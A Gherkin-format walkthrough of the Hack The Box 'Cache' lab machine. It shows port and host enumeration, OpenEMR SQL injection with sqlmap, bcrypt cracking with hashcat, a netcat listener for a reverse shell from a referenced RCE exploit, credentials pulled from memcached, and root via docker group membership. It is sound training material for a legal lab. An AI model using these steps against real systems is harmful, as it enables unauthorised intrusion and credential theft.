## Version 2.0
## language: en

Feature: cache - machine lab - hack the box
  Code:
    cache
  Site:
    https://hackthebox.eu
  Category:
    machine lab
  User:
    Sierris
  Goal:
    Find the user and root flag

  Background:
  Hacker's software:
    | <Software name>      | <Version>   |
    | Ubuntu               | 18.04.5     |
    | Firefox ESR          | 80.0.1      |
    | nmap                 | 7.80        |
    | ffuf                 | 1.1.0       |
    | searchsploit         | 2020-09-09  |
    | gobuster             | 3.0.1       |
    | sqlmap               | 1.2.4       |
  Machine information:
    Given The machine with IP 10.10.10.188
    Then I access It through the VPN

  Scenario: Success:Information Gathering
    Given I run the following nmap command
    """
    $ sudo nmap -sS -sV -v -p- --max-retries=5 --min-rate=5000 10.10.10.188
    """
    Then I noticed only port 80 an port 22 are open
    """
    PORT      STATE    SERVICE    VERSION
    22/tcp    open     ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
    80/tcp    open     http       Apache httpd 2.4.29 ((Ubuntu))
    """

  Scenario: Failure: Enumerate directories
    Given the port 80
    Then I acces it through Firefox
    And there is a webapp running
    When I scan the web server for directories
    """
    $ gobuster dir -u http://10.10.10.188/ -w /usr/share/wordlists/dirb/big.txt
      -w html,php,txt -t 16
    """
    Then I don't find anything useful

  Scenario: Success: Finding some credentials
    When I navigate through the webpage I found an author.html
    Then I found the author is talking about HSM (Hospital Management System)
    When I navigate to login.html I found a login page
    When I login into the page it says
    """
    invalid password
    """
    But There is no petition being sent
    And If I check the page's JavaScript
    Then I found a username and password [evidence1](image1.png)
    And I'll save them for later

  Scenario: Success: Find a valid virtual host
    Given The information I found about HMS
    When I make a petition with 'ffuf'
    """
    $ ffuf -w /usr/share/wordlists/big/txt -u http://10.10.10.188/
      -H "Host: FUZZ.htb" -mc 200
    """
    Then I found a valid virtual host called 'hms.htb'
    And I add the 'hms.htb' to my '/etc/hosts' file

  Scenario: Success: Exploit OpenEMR SQLi
    Given The virtual host I found
    When I accessed it, I found a 'OpenEMR' login page
    Then Searching in Google I found out it has multiple vulnerabilities
    """
    https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf
    """
    Then I tried to exploit an SQLi vulnerability on 'find_appt_popup_user.php'
    """
    $ sqlmap -r SQLi.req
    """
    And dumped the 'openemr_admin' hash [evidence](image2.png)

  Scenario: Success: Crack openemr_admin password
    Given The hash I got
    When I run 'hashcat'
    """
    $ hashcat -a 0 -m 3200 passwd.hash /usr/share/wordlists/rockyou.txt --force
    """
    Then I get the user password

  Scenario: Success: Exploiting RCE on OpenEMR
    Given The credentials I got from the SQLi vulnerability
    When I search on 'searchsploit' for OpenEMR vulnerabilities
    Then I find an authenticated RCE vulnerability
    """
    https://www.exploit-db.com/exploits/48515
    """
    When I read the code
    And change everything necessary for it to work
    Then I set up a listener
    """
    $ nc -nlvp 4444
    """
    And execute the exploit to get a shell

  Scenario: Success: Getting user.txt
    Given I got shell for 'www-data' user
    When I use the credentials found previously
    """
    $ su ash
    """
    Then I become 'ash' user and I can read the 'user.txt' file

  Scenario: Success: Enumerate to get luffy user
    Given That I am 'ash' user
    When I enumerate the machine
    Then I notice a weird service running on port 11211
    When I search the port number on Google
    Then I found out the service is 'memcached'
    """
    https://memcached.org/
    """
    And I search how to use it
    And Found that I can connect to it using 'netcat'
    """
    $ nc 127.0.0.1 11211
    """
    When I connect to it
    Then I start querying for information
    And Found that I can query for a username and a password
    """
    stats items
    STAT items:1:number 5
    STAT items:1:number_hot 0
    STAT items:1:number_warm 0
    STAT items:1:number_cold 5
    STAT items:1:age_hot 0
    STAT items:1:age_warm 0
    STAT items:1:age 36
    STAT items:1:evicted 0
    STAT items:1:evicted_nonzero 0
    STAT items:1:evicted_time 0
    STAT items:1:outofmemory 0
    STAT items:1:tailrepairs 0
    STAT items:1:reclaimed 0
    STAT items:1:expired_unfetched 0
    STAT items:1:evicted_unfetched 0
    STAT items:1:evicted_active 0
    STAT items:1:crawler_reclaimed 0
    STAT items:1:crawler_items_checked 96
    STAT items:1:lrutail_reflocked 0
    STAT items:1:moves_to_cold 1525
    STAT items:1:moves_to_warm 1
    STAT items:1:moves_within_lru 0
    STAT items:1:direct_reclaims 0
    STAT items:1:hits_to_hot 0
    STAT items:1:hits_to_warm 0
    STAT items:1:hits_to_cold 11
    STAT items:1:hits_to_temp 0
    END
    get user
    VALUE user 0 5
    luffy
    END
    get passwd
    VALUE passwd 0 9
    <CENSORED>
    END
    """
    When I tried to SSH to the machine with those credentials
    Then I get a shell as 'luffy'

  Scenario: Success: Escalate privileges
    Given That I am the user 'luffy'
    When I enumerate the machine
    Then I notice that the user 'luffy' is part of the docker group
    And I search for privilege escalation with docker on 'GTFO bins'
    """
    https://gtfobins.github.io/gtfobins/docker/#shell
    """
    When I follow the instructions on 'GTFO bins'
    Then I get a root shell using the ubuntu image (evidence)[image3.png]
    And I am able to read the 'root.txt' flag
